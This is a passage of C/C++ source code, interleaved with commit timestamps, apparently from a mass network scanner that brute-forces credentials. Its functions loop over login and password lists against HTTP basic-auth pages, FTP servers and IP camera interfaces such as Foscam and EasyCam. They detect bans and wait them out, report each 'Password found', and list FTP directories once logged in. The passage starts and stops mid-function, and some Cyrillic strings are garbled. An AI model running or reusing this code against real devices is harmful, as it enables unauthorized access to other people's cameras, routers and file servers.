CSSOCKET ( sock ) ;
isActive = 0 ;
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
}
} ;
CSSOCKET ( sock ) ;
} ;
2015-02-24 14:14:32 +00:00
2015-02-24 14:00:19 +00:00
2015-02-28 11:47:21 +00:00
if ( MapWidgetOpened ) stt - > doEmitionAddIncData ( QString ( ip ) , QString ( recvBuff ) ) ;
if ( dataSz = = 0 )
2015-02-24 14:00:19 +00:00
{
stt - > doEmitionBAData ( " [BA] No reply from: " + QString ( ip ) + " ; Repeating... " ) ;
- - j ;
continue ;
}
else
{
+ + passCounter ;
} ;
2015-02-28 11:47:21 +00:00
if ( strcmp ( method , " [DIGEST] " ) = = 0 )
2015-02-24 14:00:19 +00:00
{
ZeroMemory ( localBuff , sizeof ( localBuff ) ) ;
strcpy ( localBuff , recvBuff ) ;
} ;
2015-02-28 11:47:21 +00:00
if ( strstri ( recvBuff , " http/1.1 401 " ) ! = NULL
2015-03-01 12:01:24 +00:00
| | strstri ( recvBuff , " http/1.0 401 " ) ! = NULL
| | ( strstri ( recvBuff , " 200 ok " ) ! = NULL
& & strstri ( recvBuff , " <statusValue>401</statusValue> " ) ! = NULL
& & strstri ( recvBuff , " <statusString>Unauthorized</statusString> " ) ! = NULL )
)
2015-02-24 14:00:19 +00:00
{
2015-02-28 11:47:21 +00:00
Sleep ( 200 ) ;
} else
//if(strstri(recvBuff, "http/1.1 401") == NULL
// || strstri(recvBuff, "http/1.0 401") == NULL
// )
//{
// if ((strstri(recvBuff, "200 ok") != NULL
// || strstri(recvBuff, "http/1.0 200") != NULL
// || strstri(recvBuff, "http/1.1 200") != NULL
// )
// && strstr(headerMsg, "неправильны") == NULL
// && strstr(headerMsg, "Неправильны") == NULL
// && strstr(headerMsg, "Неправильны") == NULL)
// {
// }
// stt->doEmition_BARedData("[.] 503/400/403 - Waiting 30sec (" + QString(ip) + ":" + QString::number(port) + ")");
// Sleep(200);
// ///dummy///
//}
if ( strstri ( recvBuff , " 503 service unavailable " ) ! = NULL
2015-02-24 14:00:19 +00:00
| | strstri ( recvBuff , " http/1.1 503 " ) ! = NULL
| | strstri ( recvBuff , " http/1.0 503 " ) ! = NULL
| | strstr ( recvBuff , " 400 BAD_REQUEST " ) ! = NULL
| | strstri ( recvBuff , " 400 bad request " ) ! = NULL
| | strstr ( recvBuff , " 403 Forbidden " ) ! = NULL
)
{
stt - > doEmition_BARedData ( " [.] 503/400/403 - Waiting 30sec ( " + QString ( ip ) + " : " + QString : : number ( port ) + " ) " ) ;
if ( j > 0 ) - - j ;
Sleep ( 30000 ) ;
}
else if ( ( strstri ( recvBuff , " http/1.1 404 " ) ! = NULL
| | strstri ( recvBuff , " http/1.0 404 " ) ! = NULL
)
& & strstri ( recvBuff , " Authorization required " ) = = NULL
)
{
if ( HTMLDebugMode ) _DebugWriteHTMLToFile ( request , recvBuff ) ;
2015-03-01 12:49:55 +00:00
if ( i > 0 | | j > 0 ) stt - > doEmitionYellowFoundData ( " [?] Unexpected 404. Check <u> " + QString ( ip ) + " : " + QString : : number ( port ) + " l/p: " + QString ( tPass ) + " </u> manually. ( " + QString ( ip ) + " : " + QString : : number ( port ) + QString ( path ) + " ) " ) ;
else stt - > doEmitionRedFoundData ( " [-] 404 - Wrong path detected. ( " + QString ( ip ) + " : " + QString : : number ( port ) + QString ( path ) + " ) " ) ;
2015-02-24 14:00:19 +00:00
isActive = 0 ;
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
}
2015-02-28 11:47:21 +00:00
else if ( ( strstri ( recvBuff , " 200 ok " ) ! = NULL
2015-02-24 14:00:19 +00:00
| | strstri ( recvBuff , " http/1.0 200 " ) ! = NULL
2015-02-28 11:47:21 +00:00
| | strstri ( recvBuff , " http/1.1 200 " ) ! = NULL
2015-02-24 14:00:19 +00:00
)
& & strstri ( recvBuff , " http/1.1 401 " ) = = NULL
& & strstri ( recvBuff , " http/1.0 401 " ) = = NULL
2015-03-01 12:01:24 +00:00
& & strstri ( recvBuff , " <statusValue>401</statusValue> " ) = = NULL
& & strstri ( recvBuff , " <statusString>Unauthorized</statusString> " ) = = NULL
& & strstri ( recvBuff , " неправильны " ) = = NULL
& & strstri ( recvBuff , " Неправильны " ) = = NULL
2015-02-24 14:00:19 +00:00
& & dataSz > 13
)
{
if ( strstri ( recvBuff , " access is denied " ) = = NULL
& & strstri ( recvBuff , " iisstart " ) = = NULL
& & strstri ( recvBuff , " Location: " ) = = NULL
& & strstri ( recvBuff , " access forbidden " ) = = NULL
)
{
ZeroMemory ( pass , sizeof ( pass ) ) ;
strcpy ( pass , ip ) ;
strcat ( pass , " - Password found: " ) ;
strcat ( pass , tPass ) ;
isActive = 0 ;
stt - > doEmition_BAGreenData ( " [+] " + QString ( pass ) ) ;
strcpy ( lps . login , curLogin ) ;
strcpy ( lps . pass , curPass ) ;
return lps ;
} ;
}
else
{
2015-03-01 12:01:24 +00:00
if ( strstri ( recvBuff , " неправильны " ) = = NULL
& & strstri ( recvBuff , " Неправильны " ) = = NULL )
2015-02-24 14:00:19 +00:00
{
2015-02-28 11:47:21 +00:00
ZeroMemory ( pass , sizeof ( pass ) ) ;
sprintf ( pass , " %s - Password found: %s " , ip , tPass ) ;
char * pt1 = strstr ( recvBuff , " " ) ;
if ( pt1 ! = NULL )
2015-02-24 14:00:19 +00:00
{
2015-02-28 11:47:21 +00:00
char * pt2 = strstr ( pt1 + 1 , " " ) ;
if ( pt2 ! = NULL )
{
int sz = pt2 - pt1 - 1 ;
char tempHeaderCode [ 16 ] = { 0 } ;
strncpy ( tempHeaderCode , pt1 + 1 , sz ) ;
2015-02-24 14:00:19 +00:00
2015-02-28 11:47:21 +00:00
if ( strcmp ( tempHeaderCode , " 302 " ) = = 0 & & strcmp ( tempHeaderCode , " 200 " ) = = 0 ) stt - > doEmitionYellowFoundData ( " [+] No/unexpected HTTP header detected ( " + QString ( tempHeaderCode ) + " ) IP: <a style= \" color: #efe100; \" href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </a> " ) ;
strcpy ( lps . login , curLogin ) ;
strcpy ( lps . pass , curPass ) ;
return lps ;
} ;
2015-02-24 14:00:19 +00:00
} ;
2015-02-28 11:47:21 +00:00
stt - > doEmitionYellowFoundData ( " [+] No/unexpected HTTP header detected (?) IP: <a style= \" color: #efe100; \" href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </a> " ) ;
strcpy ( lps . login , curLogin ) ;
strcpy ( lps . pass , curPass ) ;
isActive = 0 ;
return lps ;
}
else Sleep ( 200 ) ;
2015-02-24 14:00:19 +00:00
} ;
2015-02-28 11:47:21 +00:00
2015-02-24 14:00:19 +00:00
if ( strstr ( recvBuff , " Set-Cookie: " ) ! = NULL )
{
ZeroMemory ( cookie , COOKIE_MAX_SIZE ) ;
2015-03-07 17:31:48 +00:00
// strncpy(cookie, _getAttribute(recvBuff, "Set-Cookie:"), COOKIE_MAX_SIZE);
2015-02-24 14:00:19 +00:00
cookieLen = strlen ( cookie ) ;
} ;
} ;
} ;
2015-02-24 14:14:32 +00:00
2015-02-24 14:00:19 +00:00
isActive = 0 ;
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
}
2015-02-26 14:20:37 +00:00
2015-03-06 14:32:36 +00:00
lopaStr _BALobby ( char * cookie , char * ip , int port , char * path , char * method )
2015-02-24 14:00:19 +00:00
{
while ( BrutingThrds > = gMaxBrutingThreads ) Sleep ( 700 ) ;
2015-03-13 14:27:21 +00:00
BruteUtils : : BConInc ( ) ;
2015-02-24 14:00:19 +00:00
lopaStr res = _BABrute ( cookie , ip , port , path , method ) ;
2015-03-13 14:27:21 +00:00
BruteUtils : : BConDec ( ) ;
2015-02-24 14:00:19 +00:00
return res ;
2015-02-26 14:20:37 +00:00
}
2015-02-24 14:00:19 +00:00
lopaStr _FTPBrute ( char * ip , int port , PathStr * ps )
{
lopaStr lps ;
ZeroMemory ( lps . login , sizeof ( lps . login ) ) ;
ZeroMemory ( lps . pass , sizeof ( lps . pass ) ) ;
ZeroMemory ( lps . other , sizeof ( lps . other ) ) ;
char recvBuff [ 1024 ] = { 0 } , request [ 64 ] = { 0 } ;
sockaddr_in sockAddr ;
sockAddr . sin_family = AF_INET ;
sockAddr . sin_port = htons ( port ) ;
HOSTENT * host ;
# if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
if ( inet_addr ( ip ) ! = INADDR_NONE ) sockAddr . sin_addr . S_un . S_addr = inet_addr ( ip ) ;
else if ( host = gethostbyname ( ip ) ) ( ( unsigned long * ) & sockAddr . sin_addr ) [ 0 ] = ( ( unsigned long * * ) host - > h_addr_list ) [ 0 ] [ 0 ] ;
else
{
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
# else
if ( inet_addr ( ip ) ! = INADDR_NONE ) sockAddr . sin_addr . s_addr = inet_addr ( ip ) ;
else if ( host = gethostbyname ( ip ) ) ( ( unsigned long * ) & sockAddr . sin_addr ) [ 0 ] = ( ( unsigned long * * ) host - > h_addr_list ) [ 0 ] [ 0 ] ;
else
{
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
# endif
bool breakPassLoop = 0 ;
int passCounter = 1 ;
int bTO ;
int x = 0 ;
int connectionResult , closedSocket = 1 , loginFailedFlag = 0 ;
SOCKET sockFTP ;
for ( int i = 0 ; i < MaxLogin ; + + i )
{
if ( globalScanFlag = = false ) break ;
if ( strlen ( loginLst [ i ] ) < = 1 ) continue ;
for ( int j = 0 ; j < MaxPass ; + + j )
{
if ( globalScanFlag = = false ) break ;
if ( strlen ( passLst [ j ] ) < = 1 ) continue ;
if ( closedSocket )
{
closedSocket = 0 ;
sockFTP = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
connectionResult = connect ( sockFTP , ( sockaddr * ) & sockAddr , sizeof ( sockAddr ) ) ;
2015-02-27 17:40:12 +00:00
while ( WSAGetLastError ( ) = = WSAENOTSOCK )
2015-02-24 14:00:19 +00:00
{
2015-02-27 13:55:35 +00:00
if ( gDebugMode ) stt - > doEmitionDebugFoundData ( " [FTP][ENOTSOCK] [ " + QString ( ip ) + " : " + QString : : number ( port ) + " ] " ) ;
2015-02-24 14:00:19 +00:00
CSSOCKET ( sockFTP ) ;
sockFTP = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
connectionResult = connect ( sockFTP , ( sockaddr * ) & sockAddr , sizeof ( sockAddr ) ) ;
} ;
loginFailedFlag = 0 ;
} ;
isActive = 1 ;
if ( connectionResult ! = SOCKET_ERROR )
{
x = 0 ;
while ( true )
{
Sleep ( 100 ) ;
ZeroMemory ( recvBuff , 1024 ) ;
x = recvWT ( sockFTP , recvBuff , 1024 , gTimeOut + 5 , & bTO ) ;
if ( x < = 0 ) break ;
if ( MapWidgetOpened ) stt - > doEmitionAddIncData ( QString ( ip ) , QString ( recvBuff ) ) ;
Activity + = x ;
closedSocket = 0 ;
if ( strstr ( recvBuff , " 451 The parameter is incorrect " ) ! = NULL )
{
CSSOCKET ( sockFTP ) ;
isActive = 0 ;
stt - > doEmition_BARedData ( " [*] Unknown protocol (451 Error) - " + QString ( ip ) ) ;
strcpy ( lps . other , " Unknown protocol (451 Error) " ) ;
return lps ;
} ;
if ( strstri ( recvBuff , " only anonymous " ) ! = NULL )
{
CSSOCKET ( sockFTP ) ;
isActive = 0 ;
stt - > doEmition_BAGreenData ( " [*] Anonymous access detected - " + QString ( ip ) ) ;
strcpy ( lps . login , " anonymous " ) ;
strcpy ( lps . pass , " 1 " ) ;
return lps ;
} ;
if ( strstr ( recvBuff , " 550 no connections allowed " ) ! = NULL
| | strstr ( recvBuff , " 550- " ) ! = NULL
)
{
CSSOCKET ( sockFTP ) ;
isActive = 0 ;
2015-02-24 14:14:32 +00:00
2015-02-24 14:00:19 +00:00
stt - > doEmition_BARedData ( " [-] 550 (No connections allowed) - Ban detected. Dropping " + QString ( ip ) ) ;
2015-02-24 14:14:32 +00:00
2015-02-24 14:00:19 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
if ( strstr ( recvBuff , " no such command " ) )
{
CSSOCKET ( sockFTP ) ;
isActive = 0 ;
stt - > doEmition_BARedData ( " [-] 500 (Sorry, no such command) " + QString ( ip ) ) ;
strcpy ( lps . other , " [500 Sorry, no such command] " ) ;
return lps ;
} ;
if ( ( strstr ( recvBuff , " 500 " ) ! = NULL
| | strstr ( recvBuff , " 500- " ) ! = NULL
)
& & strstri ( recvBuff , " 500 oops " ) = = NULL
)
{
j = 0 ;
break ;
} ;
if ( strstr ( recvBuff , " 421 " ) ! = NULL | | strstr ( recvBuff , " 421- " ) ! = NULL )
{
break ;
} ;
if ( strstri ( recvBuff , " 530 Sorry, no ANONYMOUS access allowed. " ) ! = NULL )
{
+ + i ;
break ;
} ;
if ( globalScanFlag = = false ) break ;
if ( ( strstr ( recvBuff , " 530 Sorry " ) ! = NULL )
| | ( strstr ( recvBuff , " 530 " ) ! = NULL & & strstr ( recvBuff , " maximum " ) ! = NULL )
| | strstr ( recvBuff , " exceeded " ) ! = NULL
| | strstr ( recvBuff , " 421 Too many " ) ! = NULL
| | strstr ( recvBuff , " from this IP " ) ! = NULL
| | strstr ( recvBuff , " from your IP " ) ! = NULL )
{
stt - > doEmition_BARedData ( " [-] FTP: 530 - Ban detected? Waiting 30sec ( " + QString ( ip ) + " ) " ) ;
if ( j > 0 ) - - j ;
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
Sleep ( 30000 ) ;
break ;
}
else if ( ( strstr ( recvBuff , " 220 " ) ! = NULL | | loginFailedFlag = = 1 | | strstr ( recvBuff , " 503 " ) ! = NULL | | strstr ( recvBuff , " server ready " ) ! = NULL ) )
{
strcpy ( request , " USER " ) ;
if ( strlen ( loginLst [ i ] ) ! = 0 ) strcat ( request , loginLst [ i ] ) ;
else
{
loginFailedFlag = 1 ;
break ;
} ;
strcat ( request , " \r \n " ) ;
if ( send ( sockFTP , request , strlen ( request ) , 0 ) ! = SOCKET_ERROR )
{
2015-03-10 20:09:05 +00:00
if ( MapWidgetOpened ) stt - > doEmitionAddOutData ( QString ( request ) ) ;
2015-02-24 14:00:19 +00:00
Activity + = strlen ( request ) ;
ZeroMemory ( request , sizeof ( request ) ) ;
}
else
{
stt - > doEmitionRedFoundData ( " [FTP] Send error. " + QString ( ip ) + " : " + QString : : number ( port ) ) ;
} ;
}
else if ( strstr ( recvBuff , " 530 " ) ! = NULL
| | strstr ( recvBuff , " Login incorrect " ) ! = NULL
| | strstri ( recvBuff , " 500 oops " ) ! = NULL
)
{
loginFailedFlag = 1 ;
break ;
}
else if ( strstr ( recvBuff , " 331 " ) ! = NULL )
{
if ( strstr ( recvBuff , " Non-anonymous sessions must use encryption " ) ! = NULL
| | strstr ( recvBuff , " Rejected--secure connection required " ) ! = NULL
)
{
stt - > doEmition_BARedData ( " FTP server ( " + QString ( ip ) + " ) appears to require SSL for specified user: " + QString ( loginLst [ i ] ) ) ;
CSSOCKET ( sockFTP ) ;
isActive = 0 ;
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
}
else if ( strstri ( recvBuff , " permission denied " ) = = NULL )
{
strcpy ( request , " PASS " ) ;
if ( strlen ( passLst [ j ] ) ! = 0 ) strcat ( request , passLst [ j ] ) ;
else
{
loginFailedFlag = 1 ;
break ;
} ;
strcat ( request , " \r \n " ) ;
if ( send ( sockFTP , request , strlen ( request ) , 0 ) ! = SOCKET_ERROR )
{
2015-03-10 20:09:05 +00:00
if ( MapWidgetOpened ) stt - > doEmitionAddOutData ( QString ( request ) ) ;
2015-02-24 14:00:19 +00:00
Activity + = strlen ( request ) ;
ZeroMemory ( request , sizeof ( request ) ) ;
if ( BALogSwitched ) stt - > doEmitionBAData ( " Probing FTP: " + QString ( ip ) + " : " + QString : : number ( port ) + " ; login/pass: " + QString ( loginLst [ i ] ) + " : " + QString ( passLst [ j ] ) + " ; - Progress: ( " + QString : : number ( ( passCounter / ( double ) ( MaxPass * MaxLogin ) ) * 100 ) . mid ( 0 , 4 ) + " %) " ) ;
+ + passCounter ;
}
else
{
stt - > doEmitionRedFoundData ( " [FTP] Send error. " + QString ( ip ) + " : " + QString : : number ( port ) ) ;
} ;
}
else
{
breakPassLoop = 1 ;
stt - > doEmition_BARedData ( " Permission denied for login - " + QString ( ip ) + " : " + QString : : number ( port ) + " ; login: " + QString ( loginLst [ i ] ) ) ;
break ;
} ;
}
else if ( strstr ( recvBuff , " 230 " ) ! = NULL )
{
char pass [ 128 ] = { 0 } ;
strcpy ( pass , ip ) ;
strcat ( pass , " - FTP Password found: " ) ;
strcat ( pass , loginLst [ i ] ) ;
strcat ( pass , " : " ) ;
strcat ( pass , passLst [ j ] ) ;
char recvBuff2 [ 2048 ] = { 0 } ;
if ( send ( sockFTP , " PASV \r \n " , 6 , 0 ) ! = SOCKET_ERROR )
{
int x = 1 , xx = 0 ;
while ( x ! = 0 )
{
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
x = recvWT ( sockFTP , recvBuff , sizeof ( recvBuff ) , gTimeOut + 5 , & bTO ) ;
xx + = x ;
if ( xx < 1536 ) strncat ( recvBuff2 , recvBuff , x ) ;
else break ;
} ;
if ( strstri ( recvBuff2 , " unknown command " ) ! = NULL | | strstri ( recvBuff2 , " invalid command " ) ! = NULL )
{
stt - > doEmitionYellowFoundData ( " [-] PASV failed. Router detected? " ) ;
CSSOCKET ( sockFTP ) ;
strcpy ( lps . login , loginLst [ i ] ) ;
strcpy ( lps . pass , passLst [ j ] ) ;
strcpy ( lps . other , " ROUTER " ) ;
isActive = 0 ;
return lps ;
} ;
char * ptr0 = strstr ( recvBuff2 , " 227 " ) ;
if ( ptr0 ! = NULL )
{
if ( strstr ( ptr0 , " ( " ) ! = NULL )
{
char pasvData [ 32 ] = { 0 } ;
char * ptr1 = strstr ( ptr0 , " ( " ) ;
char * ptr2 = strstr ( ptr0 , " ) " ) ;
int sz = ptr2 - ptr1 - 1 ;
strncpy ( pasvData , ptr1 + 1 , sz ) ;
char * ptr3 = strstr ( pasvData , " , " ) ;
ptr3 = strstr ( ptr3 + 1 , " , " ) ;
ptr3 = strstr ( ptr3 + 1 , " , " ) ;
ptr3 = strstr ( ptr3 + 1 , " , " ) ;
if ( ptr3 ! = NULL )
{
char * ptrP2 = strstr ( ptr3 + 1 , " , " ) ;
char p1c [ 8 ] = { 0 } ;
sz = ptrP2 - ptr3 - 1 ;
strncpy ( p1c , ptr3 + 1 , sz ) ;
int p1 = atoi ( p1c ) ;
int p2 = atoi ( ptrP2 + 1 ) ;
port = p1 * 256 + p2 ;
sockAddr . sin_port = htons ( port ) ;
SOCKET newSockFTP = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
connectionResult = connect ( newSockFTP , ( sockaddr * ) & sockAddr , sizeof ( sockAddr ) ) ;
send ( sockFTP , " LIST \r \n " , 6 , 0 ) ;
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
int x = recvWT ( newSockFTP , recvBuff , sizeof ( recvBuff ) , gTimeOut + 3 , & bTO ) ;
if ( x < = 0 | | strstr ( recvBuff , " unknown command " ) ! = NULL )
{
send ( sockFTP , " MLSD \r \n " , 6 , 0 ) ;
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
x = recvWT ( newSockFTP , recvBuff , sizeof ( recvBuff ) , gTimeOut + 3 , & bTO ) ;
if ( x < = 0 | | strstr ( recvBuff , " unknown command " ) ! = NULL )
{
stt - > doEmition_BAGreenData ( " [?] " + QString ( pass ) + " [MLSD&LIST failed or server closed connection.] " ) ;
CSSOCKET ( sockFTP ) ;
CSSOCKET ( newSockFTP ) ;
closedSocket = 1 ;
isActive = 0 ;
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
}
else {
stt - > doEmition_BAGreenData ( " [+] " + QString ( pass ) + " [MLSD succeeded] " ) ;
ps - > directoryCount = _countFTPDirectories ( recvBuff ) ;
} ;
}
else
{
stt - > doEmition_BAGreenData ( " [+] " + QString ( pass ) + " [LIST succeeded] " ) ;
ps - > directoryCount = _countFTPDirectories ( recvBuff ) ;
} ;
CSSOCKET ( newSockFTP ) ;
}
else
{
stt - > doEmitionYellowFoundData ( " [*] " + QString ( ip ) + " [PASV failed] " ) ;
} ;
}
else
{
stt - > doEmitionYellowFoundData ( " [*] " + QString ( ip ) + " [PASV TO] Failed! " ) ;
} ;
}
else
{
stt - > doEmitionYellowFoundData ( " [*] " + QString ( ip ) + " [PASV TO] Failed! " ) ;
} ;
2015-02-24 14:14:32 +00:00
2015-02-24 14:00:19 +00:00
if ( xx > 1 )
{
strcpy ( ps - > headr , " </a><pre><font color= \" goldenrod \" > ( " ) ;
strncat ( ps - > headr , recvBuff , 256 ) ;
strcat ( ps - > headr , " )</font></pre> " ) ;
} ;
strcpy ( lps . login , loginLst [ i ] ) ;
strcpy ( lps . pass , passLst [ j ] ) ;
CSSOCKET ( sockFTP ) ;
isActive = 0 ;
return lps ;
}
else
{
stt - > doEmitionRedFoundData ( " [FTP] Send error. " + QString ( ip ) + " : " + QString : : number ( port ) ) ;
strcpy ( lps . login , loginLst [ i ] ) ;
strcpy ( lps . pass , passLst [ j ] ) ;
CSSOCKET ( sockFTP ) ;
isActive = 0 ;
return lps ;
} ;
} ;
} ;
CSSOCKET ( sockFTP ) ;
closedSocket = 1 ;
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
}
else
2015-02-27 13:55:35 +00:00
{
2015-02-24 14:00:19 +00:00
int WSAerr ;
if ( connectionResult = = - 1 ) WSAerr = WSAGetLastError ( ) ;
2015-02-27 17:40:12 +00:00
else WSAerr = WSAETIMEDOUT ;
2015-02-27 13:55:35 +00:00
if ( gThreads > 1
2015-02-27 17:40:12 +00:00
& & WSAerr ! = WSAETIMEDOUT /*Timeout*/
& & WSAerr ! = WSAENOBUFS /*POOLOVERFLOW*/
& & WSAerr ! = WSAECONNREFUSED /*WSAECONNREFUSED*/
& & WSAerr ! = WSAECONNRESET /*WSAECONNRESET*/
2015-02-27 13:55:35 +00:00
& & WSAerr ! = 0 )
2015-02-24 14:00:19 +00:00
{
stt - > doEmitionRedFoundData ( " [FTPBrute] Cannot connect to " + QString ( ip ) + " " + QString ( std : : to_string ( WSAerr ) . c_str ( ) ) ) ;
} ;
CSSOCKET ( sockFTP ) ;
isActive = 0 ;
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
Sleep ( 100 ) ;
if ( breakPassLoop )
{
breakPassLoop = false ;
break ;
} ;
} ;
} ;
CSSOCKET ( sockFTP ) ;
isActive = 0 ;
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
2015-02-26 14:20:37 +00:00
}
2015-03-05 14:29:05 +00:00
lopaStr _FTPLobby ( char * ip , int port , PathStr * ps )
2015-02-24 14:00:19 +00:00
{
while ( BrutingThrds > = gMaxBrutingThreads ) Sleep ( 700 ) ;
lopaStr lps ;
ZeroMemory ( lps . login , sizeof ( lps . login ) ) ;
ZeroMemory ( lps . pass , sizeof ( lps . pass ) ) ;
ZeroMemory ( lps . other , sizeof ( lps . other ) ) ;
2015-03-13 14:27:21 +00:00
BruteUtils : : BConInc ( ) ;
2015-02-24 14:00:19 +00:00
lps = _FTPBrute ( ip , port , ps ) ;
2015-03-13 14:27:21 +00:00
BruteUtils : : BConDec ( ) ;
2015-02-24 14:00:19 +00:00
return lps ;
2015-02-26 14:20:37 +00:00
}
2015-02-24 14:00:19 +00:00
int _webLoginSeq ( char * request , char * login , char * pass , char * ip , int port , int passCounter , char * type , std : : vector < char * > negVector )
{
char recvBuff [ 256 ] = { 0 } ;
char recvBuff2 [ 4096 ] = { 0 } ;
SOCKET sock ;
sockaddr_in sockAddr ;
int bTO ;
sockAddr . sin_family = AF_INET ;
sockAddr . sin_port = htons ( port ) ;
HOSTENT * host ;
# if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
if ( inet_addr ( ip ) ! = INADDR_NONE ) sockAddr . sin_addr . S_un . S_addr = inet_addr ( ip ) ;
else if ( host = gethostbyname ( ip ) ) ( ( unsigned long * ) & sockAddr . sin_addr ) [ 0 ] = ( ( unsigned long * * ) host - > h_addr_list ) [ 0 ] [ 0 ] ;
else
{
return - 1 ;
} ;
# else
if ( inet_addr ( ip ) ! = INADDR_NONE ) sockAddr . sin_addr . s_addr = inet_addr ( ip ) ;
2015-02-27 13:55:35 +00:00
else if ( host = gethostbyname ( ip ) ) ( ( unsigned long * ) & sockAddr . sin_addr ) [ 0 ] = ( ( unsigned long * * ) host - > h_addr_list ) [ 0 ] [ 0 ] ;
2015-02-24 14:00:19 +00:00
else
{
return - 1 ;
} ;
# endif
sock = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
int cCode = connect ( sock , ( sockaddr * ) & sockAddr , sizeof ( sockAddr ) ) ;
int cErrCode = WSAGetLastError ( ) ;
2015-02-27 17:40:12 +00:00
while ( cErrCode = = WSAENOTSOCK )
2015-02-24 14:00:19 +00:00
{
CSSOCKET ( sock ) ;
sock = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
cCode = connect ( sock , ( sockaddr * ) & sockAddr , sizeof ( sockAddr ) ) ;
cErrCode = WSAGetLastError ( ) ;
2015-02-27 13:55:35 +00:00
if ( gDebugMode ) stt - > doEmitionDebugFoundData ( " [ " + QString ( type ) + " ][ENOTSOCK] [ " + QString ( ip ) + " : " + QString : : number ( port ) + " ] " ) ;
2015-02-24 14:00:19 +00:00
} ;
if ( cCode ! = SOCKET_ERROR )
2015-02-27 13:55:35 +00:00
{
2015-02-24 14:00:19 +00:00
Activity + = strlen ( request ) ;
if ( send ( sock , request , strlen ( request ) , 0 ) = = SOCKET_ERROR )
{
stt - > doEmitionRedFoundData ( " [ " + QString ( type ) + " ] Send error! [ " + QString ( ip ) + " ] " ) ;
CSSOCKET ( sock ) ;
return 0 ;
}
else
{
2015-03-10 20:09:05 +00:00
if ( MapWidgetOpened ) stt - > doEmitionAddOutData ( QString ( request ) ) ;
2015-02-24 14:00:19 +00:00
int x = 1 ;
int xx = 0 ;
ZeroMemory ( recvBuff2 , sizeof ( recvBuff2 ) ) ;
while ( xx < 3072 )
{
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
x = recvWT ( sock , recvBuff , sizeof ( recvBuff ) , gTimeOut + 2 , & bTO ) ;
if ( x < = 0 ) break ;
strncat ( recvBuff2 , recvBuff , x ) ;
xx + = x ;
Activity + = x ;
} ;
if ( BALogSwitched ) stt - > doEmitionBAData ( " Checked " + QString ( type ) + " : " + QString ( ip ) + " : " + QString : : number ( port ) + " ; login/pass: " + QString ( login ) + " : " + QString ( pass ) + " ; - Progress: ( " + QString : : number ( ( passCounter / ( double ) ( MaxPass * MaxLogin ) ) * 100 ) . mid ( 0 , 4 ) + " %) " ) ;
if ( MapWidgetOpened ) stt - > doEmitionAddIncData ( QString ( ip ) , QString ( recvBuff2 ) ) ;
if ( strlen ( recvBuff2 ) > 0 ) {
bool result = true ;
for ( int i = 0 ; i < negVector . size ( ) ; + + i )
{
if ( strstri ( recvBuff2 , negVector [ i ] ) ! = NULL )
{
result = false ;
break ;
} ;
} ;
if ( result )
{
CSSOCKET ( sock ) ;
return 1 ;
} ;
}
} ;
} ;
CSSOCKET ( sock ) ;
return 0 ;
2015-02-26 14:20:37 +00:00
}
2015-02-24 14:00:19 +00:00
lopaStr _IPCameraBrute ( char * ip , int port , char * SPEC )
{
lopaStr lps ;
ZeroMemory ( lps . login , sizeof ( lps . login ) ) ;
ZeroMemory ( lps . pass , sizeof ( lps . pass ) ) ;
ZeroMemory ( lps . other , sizeof ( lps . other ) ) ;
char login [ 128 ] = { 0 } ;
char pass [ 128 ] = { 0 } ;
char request [ 1024 ] = { 0 } ;
isActive = 1 ;
int passCounter = 1 ;
std : : vector < char * > negVector ;
if ( strcmp ( SPEC , " IPC " ) = = 0 )
{
negVector . push_back ( " <UserGroup>Invalid</UserGroup> " ) ;
}
else if ( strcmp ( SPEC , " GEO " ) = = 0 )
{
negVector . push_back ( " Access denied " ) ;
negVector . push_back ( " ErrNoSuchUsr.htm " ) ;
}
else if ( strcmp ( SPEC , " EasyCam " ) = = 0 )
{
negVector . push_back ( " Set-Cookie: usrLevel=-1;path=/ " ) ;
}
else if ( strcmp ( SPEC , " Foscam " ) = = 0 )
{
negVector . push_back ( " <result>0</result> " ) ;
negVector . push_back ( " <result>-1</result> " ) ;
negVector . push_back ( " <result>-2</result> " ) ;
negVector . push_back ( " <result>-3</result> " ) ;
negVector . push_back ( " <result>-4</result> " ) ;
negVector . push_back ( " <result>-5</result> " ) ;
negVector . push_back ( " <result>-6</result> " ) ;
negVector . push_back ( " <result>-7</result> " ) ;
}
else if ( strcmp ( SPEC , " AVIOSYS " ) = = 0 )
{
negVector . push_back ( " Password Error " ) ;
}
else if ( strcmp ( SPEC , " BUFFALO " ) = = 0 )
{
negVector . push_back ( " 403 Forbidden " ) ;
}
else if ( strcmp ( SPEC , " DVS " ) = = 0 )
{
negVector . push_back ( " Non-Existed " ) ;
}
else if ( strcmp ( SPEC , " IPCAM " ) = = 0 )
{
negVector . push_back ( " var check= \" 0 \" " ) ;
negVector . push_back ( " var authLevel = \" 0 \" ; " ) ;
}
else if ( strcmp ( SPEC , " IEORFOREFOX " ) = = 0 )
{
negVector . push_back ( " AAA() " ) ;
negVector . push_back ( " РРјСЏ или пароль неверные! " ) ;
negVector . push_back ( " Возврат " ) ;
